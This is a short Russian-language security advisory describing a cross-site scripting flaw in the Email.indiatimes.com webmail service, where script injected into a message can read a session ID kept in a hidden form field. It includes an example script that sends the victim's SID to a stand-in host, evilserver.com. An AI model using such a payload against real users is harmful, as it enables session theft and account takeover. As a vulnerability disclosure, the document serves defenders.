Email.indiatimes.com — популярная система Web почты от газеты ‘The Times of India’. Сценарии, используемые на Web сайте, позволяют пользователям вставлять HTML или JavaScript код в почтовые сообщения. Злонамеренный код, вставленный в электронное сообщение, может использоваться для похищения опознавательных мандатов (хотя сайт не использует куки, SID пользователя хранится в поле формы): 

<Form name=Rform …>
<input type=hidden name=SID value=»some_random_number:> </form>

Этот SID — единственный маркер, использующийся для подтверждения подлинности пользователя). 

Пример: 

<script> 
self.location.href="http://evilserver.com/evil.cgi?SID="+Rform.SID.value
</script>

Оставить мнение